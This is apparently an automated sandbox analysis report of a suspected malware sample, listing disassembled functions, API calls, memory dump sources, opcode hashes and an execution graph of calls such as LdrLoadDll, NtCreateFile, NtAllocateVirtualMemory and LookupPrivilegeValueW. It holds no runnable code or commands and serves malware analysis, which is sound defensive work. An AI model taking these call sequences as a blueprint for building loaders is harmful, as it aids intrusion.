                                                                                                                                                                  APIs
                                                                                                                                                                  • GetConsoleOutputCP.KERNEL32(297D850E,00000000,00000000,?), ref: 001BB9DB
                                                                                                                                                                    • Part of subcall function 001C11A1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,001BED5F,?,00000000,-00000008), ref: 001C1202
                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 001BBC2D
                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 001BBC73
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 001BBD16
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2112829910-0
                                                                                                                                                                  • Opcode ID: 30bafd1970cd88088d3fd4c9f94577787e8c4020ea79ad0efee4d28d9327d0ef
                                                                                                                                                                  • Instruction ID: e80f502c74f0e1009ec33310733f237df15c13417417044f101471337e295d32
                                                                                                                                                                  • Opcode Fuzzy Hash: 30bafd1970cd88088d3fd4c9f94577787e8c4020ea79ad0efee4d28d9327d0ef
                                                                                                                                                                  • Instruction Fuzzy Hash: A1D188B5D082489FCF15CFA8C8D0AEDBBB5FF09304F28452AE856EB651D770A942CB50
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001C11A1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,001BED5F,?,00000000,-00000008), ref: 001C1202
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 001C14C6
                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 001C14CD
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?), ref: 001C1507
                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 001C150E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1913693674-0
                                                                                                                                                                  • Opcode ID: 713b5a02dcef0686d2119146bd21ad3c03df7be2a3e72a25da7cd182d078c62d
                                                                                                                                                                  • Instruction ID: 5879813038cc4f2048a93541e567ad74cee9b4672f6f6bc840ab0e42b4f351fe
                                                                                                                                                                  • Opcode Fuzzy Hash: 713b5a02dcef0686d2119146bd21ad3c03df7be2a3e72a25da7cd182d078c62d
                                                                                                                                                                  • Instruction Fuzzy Hash: D621C572640205BF9F24AF66CC81EABB7A9FF763A8711851CF91A97142D730EC40CB61
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: d99817f9fa433bd5c7fc1e895bfdc3525a43e2deef1b28e3501ad438f4c4fbce
                                                                                                                                                                  • Instruction ID: c856b30029250c9a7dd7fa0c99d4f903c69e576394fe64e042bb281813c6158d
                                                                                                                                                                  • Opcode Fuzzy Hash: d99817f9fa433bd5c7fc1e895bfdc3525a43e2deef1b28e3501ad438f4c4fbce
                                                                                                                                                                  • Instruction Fuzzy Hash: 0C21F631608205AFAB60AF76DC81DEFB7A9BFA13A87054914F919E75D1D730ED4087A0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 001C240B
                                                                                                                                                                    • Part of subcall function 001C11A1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,001BED5F,?,00000000,-00000008), ref: 001C1202
                                                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 001C2443
                                                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 001C2463
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 158306478-0
                                                                                                                                                                  • Opcode ID: 014788fd4f561f189c1fffba61706749fabb2be4dc235c8ea1802a15aedea0ed
                                                                                                                                                                  • Instruction ID: 3a3239c8a9f2ba4f11e1779af32997580afd65e1d2d599e5c131e8cc4b445be2
                                                                                                                                                                  • Opcode Fuzzy Hash: 014788fd4f561f189c1fffba61706749fabb2be4dc235c8ea1802a15aedea0ed
                                                                                                                                                                  • Instruction Fuzzy Hash: 8211D6B2A05219FF671A27719C8EEAF6D6CEEA93A83510028F501D1101FB74CD0181B1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 001B22D8
                                                                                                                                                                    • Part of subcall function 001B2910: ___AdjustPointer.LIBCMT ref: 001B295A
                                                                                                                                                                  • _UnwindNestedFrames.LIBCMT ref: 001B22EF
                                                                                                                                                                  • ___FrameUnwindToState.LIBVCRUNTIME ref: 001B2301
                                                                                                                                                                  • CallCatchBlock.LIBVCRUNTIME ref: 001B2325
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2633735394-0
                                                                                                                                                                  • Opcode ID: 016e3b4a47e3c793a89763145e5dfa688c85616b6bcb55d92dd5a28a327169d4
                                                                                                                                                                  • Instruction ID: 579d02e0d58413cb68fcd450e2a6fa41b9a3ff32d82270c2bd18a260a69cea82
                                                                                                                                                                  • Opcode Fuzzy Hash: 016e3b4a47e3c793a89763145e5dfa688c85616b6bcb55d92dd5a28a327169d4
                                                                                                                                                                  • Instruction Fuzzy Hash: 54010832000109FBCF126F55CC01EEA3BBAFF58754F158154FD18A6121D736E9A5EBA4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • WriteConsoleW.KERNEL32(00000000,00000000,001B6731,00000000,00000000,?,001C57A5,00000000,00000001,?,?,?,001BBD6A,?,00000000,00000000), ref: 001C82CA
                                                                                                                                                                  • GetLastError.KERNEL32(?,001C57A5,00000000,00000001,?,?,?,001BBD6A,?,00000000,00000000,?,?,?,001BC344,00000000), ref: 001C82D6
                                                                                                                                                                    • Part of subcall function 001C829C: CloseHandle.KERNEL32(FFFFFFFE,001C82E6,?,001C57A5,00000000,00000001,?,?,?,001BBD6A,?,00000000,00000000,?,?), ref: 001C82AC
                                                                                                                                                                  • ___initconout.LIBCMT ref: 001C82E6
                                                                                                                                                                    • Part of subcall function 001C825E: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,001C828D,001C5792,?,?,001BBD6A,?,00000000,00000000,?), ref: 001C8271
                                                                                                                                                                  • WriteConsoleW.KERNEL32(00000000,00000000,001B6731,00000000,?,001C57A5,00000000,00000001,?,?,?,001BBD6A,?,00000000,00000000,?), ref: 001C82FB
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2744216297-0
                                                                                                                                                                  • Opcode ID: 3b1d4bc5219df6d872cf7512e75bf9178f882db4a2eab7bf29996077233b5407
                                                                                                                                                                  • Instruction ID: 85cf91a034373ea966cda54712f98a31f23d5994b53b64c93483f0c9adbc9941
                                                                                                                                                                  • Opcode Fuzzy Hash: 3b1d4bc5219df6d872cf7512e75bf9178f882db4a2eab7bf29996077233b5407
                                                                                                                                                                  • Instruction Fuzzy Hash: 62F03036003169BFCF221F91DC48E8A3F66FF28BE1B404014FA098A530CB32C861DB92
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • __startOneArgErrorHandling.LIBCMT ref: 001B768D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorHandling__start
                                                                                                                                                                  • String ID: pow
                                                                                                                                                                  • API String ID: 3213639722-2276729525
                                                                                                                                                                  • Opcode ID: f668f79c6b685a753630803679e9e46d0d5eedc6d4f341468a1bb8a5b3c18c0c
                                                                                                                                                                  • Instruction ID: 10ad830b254699740e1bffb8d76a5a4a8e745c388e7cefb8e0387406f1e14244
                                                                                                                                                                  • Opcode Fuzzy Hash: f668f79c6b685a753630803679e9e46d0d5eedc6d4f341468a1bb8a5b3c18c0c
                                                                                                                                                                  • Instruction Fuzzy Hash: DC519C61A1D602D6DB177B58C901BFA7BE0EBA4B40F304D6CE096812E9EF35CCD19A46
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Execution Graph

                                                                                                                                                                  Execution Coverage:1.3%
                                                                                                                                                                  Dynamic/Decrypted Code Coverage:2.9%
                                                                                                                                                                  Signature Coverage:5.9%
                                                                                                                                                                  Total number of Nodes:555
                                                                                                                                                                  Total number of Limit Nodes:64
                                                                                                                                                                  execution_graph 115001 1602ad0 LdrInitializeThunk 115002 41f110 115005 41b960 115002->115005 115006 41b986 115005->115006 115013 409d30 115006->115013 115008 41b992 115009 41b9b3 115008->115009 115021 40c1b0 115008->115021 115011 41b9a5 115057 41a6a0 115011->115057 115014 409d3d 115013->115014 115060 409c80 115013->115060 115016 409d44 115014->115016 115072 409c20 115014->115072 115016->115008 115022 40c1d5 115021->115022 115485 40b1b0 115022->115485 115024 40c22c 115489 40ae30 115024->115489 115026 40c4a3 115026->115011 115027 40c252 115027->115026 115498 414390 115027->115498 115029 40c297 115029->115026 115502 408a60 115029->115502 115031 40c2db 115031->115026 115509 41a4f0 115031->115509 115035 40c331 115036 40c338 115035->115036 115521 41a000 115035->115521 115037 41bdb0 2 API calls 115036->115037 115039 40c345 115037->115039 115039->115011 115041 40c382 115042 41bdb0 2 API calls 115041->115042 115043 40c389 115042->115043 115043->115011 115044 40c392 115045 40f490 3 API calls 115044->115045 115046 40c406 115045->115046 115046->115036 115047 40c411 115046->115047 115048 41bdb0 2 API calls 115047->115048 115049 40c435 115048->115049 115526 41a050 115049->115526 115052 41a000 2 API calls 115053 40c470 115052->115053 115053->115026 115531 419e10 115053->115531 115056 41a6a0 2 API calls 115056->115026 115058 41af50 LdrLoadDll 115057->115058 115059 41a6bf ExitProcess 115058->115059 115059->115009 115091 418bb0 115060->115091 115064 409ca6 115064->115014 115065 409c9c 115065->115064 115098 41b2a0 115065->115098 115067 409ce3 115067->115064 115109 409aa0 115067->115109 115069 409d03 115115 409620 LdrLoadDll 115069->115115 115071 409d15 115071->115014 115459 41b590 115072->115459 115075 41b590 LdrLoadDll 115076 409c4b 115075->115076 115077 41b590 LdrLoadDll 115076->115077 115078 409c61 115077->115078 115079 40f170 115078->115079 115080 40f189 115079->115080 115467 40b030 115080->115467 115082 40f19c 115471 41a1d0 115082->115471 115086 40f1c2 115090 40f1ed 115086->115090 115477 41a250 115086->115477 115087 41a480 2 API calls 115089 409d55 115087->115089 115089->115008 115090->115087 115092 418bbf 115091->115092 115116 414e40 115092->115116 115094 409c93 115095 418a60 115094->115095 115122 41a5f0 115095->115122 115099 41b2b9 115098->115099 115129 414a40 115099->115129 115101 41b2d1 115102 41b2da 115101->115102 115168 41b0e0 115101->115168 115102->115067 115104 41b2ee 115104->115102 115186 419ef0 115104->115186 115437 407ea0 115109->115437 115111 409ac1 115111->115069 115112 409aba 115112->115111 115450 408160 115112->115450 115115->115071 115117 414e5a 115116->115117 115118 414e4e 115116->115118 115117->115094 115118->115117 115121 4152c0 LdrLoadDll 115118->115121 115120 414fac 115120->115094 115121->115120 115123 418a75 115122->115123 115125 41af50 115122->115125 115123->115065 115126 41af60 115125->115126 115127 41af82 115125->115127 115128 414e40 LdrLoadDll 115126->115128 115127->115123 115128->115127 115130 414d75 115129->115130 115131 414a54 115129->115131 115130->115101 115131->115130 115194 419c40 115131->115194 115134 414b80 115197 41a350 115134->115197 115135 414b63 115255 41a450 LdrLoadDll 115135->115255 115138 414b6d 115138->115101 115139 414ba7 115140 41bdb0 2 API calls 115139->115140 115141 414bb3 115140->115141 115141->115138 115142 414d39 115141->115142 115143 414d4f 115141->115143 115148 414c42 115141->115148 115144 41a480 2 API calls 115142->115144 115264 414780 LdrLoadDll NtReadFile NtClose 115143->115264 115145 414d40 115144->115145 115145->115101 115147 414d62 115147->115101 115149 414ca9 115148->115149 115151 414c51 115148->115151 115149->115142 115150 414cbc 115149->115150 115257 41a2d0 115150->115257 115153 414c56 115151->115153 115154 414c6a 115151->115154 115256 414640 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 115153->115256 115155 414c87 115154->115155 115156 414c6f 115154->115156 115155->115145 115213 414400 115155->115213 115201 4146e0 115156->115201 115159 414c60 115159->115101 115162 414c7d 115162->115101 115164 414d1c 115261 41a480 115164->115261 115166 414c9f 115166->115101 115167 414d28 115167->115101 115169 41b0f1 115168->115169 115170 41b103 115169->115170 115282 41bd30 115169->115282 115170->115104 115172 41b124 115285 414060 115172->115285 115174 41b170 115174->115104 115175 41b147 115175->115174 115176 414060 3 API calls 115175->115176 115178 41b169 115176->115178 115178->115174 115310 415380 115178->115310 115179 41b1fa 115180 41b20a 115179->115180 115404 41aef0 LdrLoadDll 115179->115404 115320 41ad60 115180->115320 115183 41b238 115399 419eb0 115183->115399 115187 41af50 LdrLoadDll 115186->115187 115188 419f0c 115187->115188 115431 1602c0a 115188->115431 115189 419f27 115191 41bdb0 115189->115191 115192 41b349 115191->115192 115434 41a660 115191->115434 115192->115067 115195 41af50 LdrLoadDll 115194->115195 115196 414b34 115195->115196 115196->115134 115196->115135 115196->115138 115198 41a36c NtCreateFile 115197->115198 115199 41af50 LdrLoadDll 115197->115199 115198->115139 115199->115198 115202 4146fc 115201->115202 115203 41a2d0 LdrLoadDll 115202->115203 115204 41471d 115203->115204 115205 414724 115204->115205 115206 414738 115204->115206 115207 41a480 2 API calls 115205->115207 115208 41a480 2 API calls 115206->115208 115209 41472d 115207->115209 115210 414741 115208->115210 115209->115162 115265 41bfc0 LdrLoadDll RtlAllocateHeap 115210->115265 115212 41474c 115212->115162 115214 41444b 115213->115214 115215 41447e 115213->115215 115216 41a2d0 LdrLoadDll 115214->115216 115217 4145c9 115215->115217 115221 41449a 115215->115221 115218 414466 115216->115218 115219 41a2d0 LdrLoadDll 115217->115219 115220 41a480 2 API calls 115218->115220 115223 4145e4 115219->115223 115222 41446f 115220->115222 115224 41a2d0 LdrLoadDll 115221->115224 115222->115166 115278 41a310 LdrLoadDll 115223->115278 115225 4144b5 115224->115225 115227 4144d1 115225->115227 115228 4144bc 115225->115228 115231 4144d6 115227->115231 115232 4144ec 115227->115232 115230 41a480 2 API calls 115228->115230 115229 41461e 115233 41a480 2 API calls 115229->115233 115234 4144c5 115230->115234 115235 41a480 2 API calls 115231->115235 115240 4144f1 115232->115240 115266 41bf80 115232->115266 115237 414629 115233->115237 115234->115166 115236 4144df 115235->115236 115236->115166 115237->115166 115248 414503 115240->115248 115269 41a400 115240->115269 115241 414557 115242 41456e 115241->115242 115277 41a290 LdrLoadDll 115241->115277 115243 414575 115242->115243 115244 41458a 115242->115244 115246 41a480 2 API calls 115243->115246 115247 41a480 2 API calls 115244->115247 115246->115248 115249 414593 115247->115249 115248->115166 115250 4145bf 115249->115250 115272 41bb80 115249->115272 115250->115166 115252 4145aa 115253 41bdb0 2 API calls 115252->115253 115254 4145b3 115253->115254 115254->115166 115255->115138 115256->115159 115258 41af50 LdrLoadDll 115257->115258 115259 414d04 115257->115259 115258->115259 115260 41a310 LdrLoadDll 115259->115260 115260->115164 115262 41a49c NtClose 115261->115262 115263 41af50 LdrLoadDll 115261->115263 115262->115167 115263->115262 115264->115147 115265->115212 115268 41bf98 115266->115268 115279 41a620 115266->115279 115268->115240 115270 41a41c NtReadFile 115269->115270 115271 41af50 LdrLoadDll 115269->115271 115270->115241 115271->115270 115273 41bba4 115272->115273 115274 41bb8d 115272->115274 115273->115252 115274->115273 115275 41bf80 2 API calls 115274->115275 115276 41bbbb 115275->115276 115276->115252 115277->115242 115278->115229 115280 41af50 LdrLoadDll 115279->115280 115281 41a63c RtlAllocateHeap 115280->115281 115281->115268 115283 41bd5d 115282->115283 115405 41a530 115282->115405 115283->115172 115286 414071 115285->115286 115287 414079 115285->115287 115286->115175 115309 41434c 115287->115309 115408 41cf20 115287->115408 115289 4140cd 115290 41cf20 2 API calls 115289->115290 115294 4140d8 115290->115294 115291 414126 115293 41cf20 2 API calls 115291->115293 115296 41413a 115293->115296 115294->115291 115413 41cfc0 115294->115413 115295 41cf20 2 API calls 115298 4141ad 115295->115298 115296->115295 115297 41cf20 2 API calls 115299 4141f5 115297->115299 115298->115297 115419 41cf80 LdrLoadDll RtlFreeHeap 115299->115419 115301 414324 115420 41cf80 LdrLoadDll RtlFreeHeap 115301->115420 115303 41432e 115421 41cf80 LdrLoadDll RtlFreeHeap 115303->115421 115305 414338 115422 41cf80 LdrLoadDll RtlFreeHeap 115305->115422 115307 414342 115423 41cf80 LdrLoadDll RtlFreeHeap 115307->115423 115309->115175 115311 415391 115310->115311 115312 414a40 8 API calls 115311->115312 115314 4153a7 115312->115314 115313 4153fa 115313->115179 115314->115313 115315 4153e2 115314->115315 115316 4153f5 115314->115316 115317 41bdb0 2 API calls 115315->115317 115318 41bdb0 2 API calls 115316->115318 115319 4153e7 115317->115319 115318->115313 115319->115179 115424 41ac20 115320->115424 115323 41ac20 LdrLoadDll 115324 41ad7d 115323->115324 115325 41ac20 LdrLoadDll 115324->115325 115326 41ad86 115325->115326 115327 41ac20 LdrLoadDll 115326->115327 115328 41ad8f 115327->115328 115329 41ac20 LdrLoadDll 115328->115329 115330 41ad98 115329->115330 115331 41ac20 LdrLoadDll 115330->115331 115332 41ada1 115331->115332 115333 41ac20 LdrLoadDll 115332->115333 115334 41adad 115333->115334 115335 41ac20 LdrLoadDll 115334->115335 115336 41adb6 115335->115336 115337 41ac20 LdrLoadDll 115336->115337 115338 41adbf 115337->115338 115339 41ac20 LdrLoadDll 115338->115339 115340 41adc8 115339->115340 115341 41ac20 LdrLoadDll 115340->115341 115342 41add1 115341->115342 115343 41ac20 LdrLoadDll 115342->115343 115344 41adda 115343->115344 115345 41ac20 LdrLoadDll 115344->115345 115346 41ade6 115345->115346 115347 41ac20 LdrLoadDll 115346->115347 115348 41adef 115347->115348 115349 41ac20 LdrLoadDll 115348->115349 115350 41adf8 115349->115350 115351 41ac20 LdrLoadDll 115350->115351 115352 41ae01 115351->115352 115353 41ac20 LdrLoadDll 115352->115353 115354 41ae0a 115353->115354 115355 41ac20 LdrLoadDll 115354->115355 115356 41ae13 115355->115356 115357 41ac20 LdrLoadDll 115356->115357 115358 41ae1f 115357->115358 115359 41ac20 LdrLoadDll 115358->115359 115360 41ae28 115359->115360 115361 41ac20 LdrLoadDll 115360->115361 115362 41ae31 115361->115362 115363 41ac20 LdrLoadDll 115362->115363 115364 41ae3a 115363->115364 115365 41ac20 LdrLoadDll 115364->115365 115366 41ae43 115365->115366 115367 41ac20 LdrLoadDll 115366->115367 115368 41ae4c 115367->115368 115369 41ac20 LdrLoadDll 115368->115369 115370 41ae58 115369->115370 115371 41ac20 LdrLoadDll 115370->115371 115372 41ae61 115371->115372 115373 41ac20 LdrLoadDll 115372->115373 115374 41ae6a 115373->115374 115375 41ac20 LdrLoadDll 115374->115375 115376 41ae73 115375->115376 115377 41ac20 LdrLoadDll 115376->115377 115378 41ae7c 115377->115378 115379 41ac20 LdrLoadDll 115378->115379 115380 41ae85 115379->115380 115381 41ac20 LdrLoadDll 115380->115381 115382 41ae91 115381->115382 115383 41ac20 LdrLoadDll 115382->115383 115384 41ae9a 115383->115384 115385 41ac20 LdrLoadDll 115384->115385 115386 41aea3 115385->115386 115387 41ac20 LdrLoadDll 115386->115387 115388 41aeac 115387->115388 115389 41ac20 LdrLoadDll 115388->115389 115390 41aeb5 115389->115390 115391 41ac20 LdrLoadDll 115390->115391 115392 41aebe 115391->115392 115393 41ac20 LdrLoadDll 115392->115393 115394 41aeca 115393->115394 115395 41ac20 LdrLoadDll 115394->115395 115396 41aed3 115395->115396 115397 41ac20 LdrLoadDll 115396->115397 115398 41aedc 115397->115398 115398->115183 115400 41af50 LdrLoadDll 115399->115400 115401 419ecc 115400->115401 115430 1602df0 LdrInitializeThunk 115401->115430 115402 419ee3 115402->115104 115404->115180 115406 41a54c NtAllocateVirtualMemory 115405->115406 115407 41af50 LdrLoadDll 115405->115407 115406->115283 115407->115406 115409 41cf30 115408->115409 115410 41cf36 115408->115410 115409->115289 115411 41bf80 2 API calls 115410->115411 115412 41cf5c 115411->115412 115412->115289 115414 41cfe5 115413->115414 115415 41d01d 115413->115415 115416 41bf80 2 API calls 115414->115416 115415->115294 115417 41cffa 115416->115417 115418 41bdb0 2 API calls 115417->115418 115418->115415 115419->115301 115420->115303 115421->115305 115422->115307 115423->115309 115425 41ac3b 115424->115425 115426 414e40 LdrLoadDll 115425->115426 115427 41ac5b 115426->115427 115428 414e40 LdrLoadDll 115427->115428 115429 41ad07 115427->115429 115428->115429 115429->115323 115430->115402 115432 1602c11 115431->115432 115433 1602c1f LdrInitializeThunk 115431->115433 115432->115189 115433->115189 115435 41a67c RtlFreeHeap 115434->115435 115436 41af50 LdrLoadDll 115434->115436 115435->115192 115436->115435 115438 407eb0 115437->115438 115439 407eab 115437->115439 115440 41bd30 2 API calls 115438->115440 115439->115112 115449 407ed5 115440->115449 115441 407f38 115441->115112 115442 419eb0 2 API calls 115442->115449 115443 407f3e 115444 407f64 115443->115444 115446 41a5b0 2 API calls 115443->115446 115444->115112 115447 407f55 115446->115447 115447->115112 115448 41bd30 2 API calls 115448->115449 115449->115441 115449->115442 115449->115443 115449->115448 115453 41a5b0 115449->115453 115451 41a5b0 2 API calls 115450->115451 115452 40817e 115451->115452 115452->115069 115454 41af50 LdrLoadDll 115453->115454 115455 41a5cc 115454->115455 115458 1602c70 LdrInitializeThunk 115455->115458 115456 41a5e3 115456->115449 115458->115456 115460 41b5b3 115459->115460 115463 40ace0 115460->115463 115464 40ad04 115463->115464 115465 40ad40 LdrLoadDll 115464->115465 115466 409c3a 115464->115466 115465->115466 115466->115075 115469 40b053 115467->115469 115468 40b0d0 115468->115082 115469->115468 115483 419c80 LdrLoadDll 115469->115483 115472 41af50 LdrLoadDll 115471->115472 115473 40f1ab 115472->115473 115473->115089 115474 41a7c0 115473->115474 115475 41af50 LdrLoadDll 115474->115475 115476 41a7df LookupPrivilegeValueW 115475->115476 115476->115086 115478 41a266 115477->115478 115479 41af50 LdrLoadDll 115478->115479 